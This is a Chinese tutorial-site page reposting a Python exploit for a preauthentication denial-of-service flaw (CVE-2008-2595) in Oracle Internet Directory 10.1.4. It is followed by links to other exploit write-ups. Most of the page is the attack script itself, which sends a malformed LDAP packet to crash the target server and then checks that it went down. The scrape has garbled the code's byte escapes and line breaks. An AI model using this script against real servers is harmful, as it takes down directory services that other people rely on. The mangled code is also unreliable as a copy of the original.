手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
摘要:#!/usr/bin/python"""OracleInternetDirectory10.1.4preauthenticationDeni...

#!/usr/bin/python"""

Oracle Internet Directory 10.1.4 preauthentication Denial Of ServiceNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.

Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one

shoot, but even when you only send one packet it will crash.Tested: Win2000 x86, WinXP x86, Win2003 X86_64Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)Fixed: Oracle Critical Patch Update July 2008

CVEID: CVE-2008-2595

"""import sys

import time

import sockethealthPacket = "0%x02x01x01c x04x00nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00"

packet = "x30x0ex02x01x01x60x09x30x01x03x04x02x44x4ex80x00"def checkHealth(hostname, port):

print " --> Wating 5 seconds"

time.sleep

(5)

print " --> Connecting to target..."

socket.setdefaulttimeout

(5)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((hostname, port)) try:

print " --> Sending 'health' packet ..."

s.sendall(healthPacket)

print " --> Trying to receive something..."

data = s.recv(1024)

except:

err = sys.exc_info()[1] if int(err[0]) == 104:

print "[ ] Exploits works!"

return if data != "":

print "[!] Server is up and running :("

else:

print "[?] Server doesn't answer nothing. It works?"def oidDos(hostname, port):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)

s.connect((hostname, int(port))) print "[ ] Sending packet..."

s.sendall(packet)

s.close() print "[ ] Checking OID's health..."

checkHealth(hostname, port)

except:

print sys.exc_info()[1]def usage():

print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"

print "Copyright (c) 2007 Joxean Koret"

print

print "Usage:"

print sys.argv[0],"-h -p"

printdef main():

if len(sys.argv) != 3:

usage()

sys.exit(0)

hostname = None

port = None i = 0

for param in sys.argv:

i = 1

if i == 1:

continue

if param.startswith("-h"):

hostname = param[2:]

elif param.startswith("-p"):

port = int(param[2:])

else:

print "Unknown option '%s'" % param

usage()

sys.exit

(1)

if not hostname or not port:

print "Bad command line."

usage()

sys.exit

(1) oidDos(hostname, port)if __name__ == "__main__":

main()

【Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit】相关文章:

百度卫士清理注册表后系统出现异常怎么办?

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

webshell低权限重启服务器的另类方法

黑客总结的实用的网站渗透步骤

Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

精品推荐
分类导航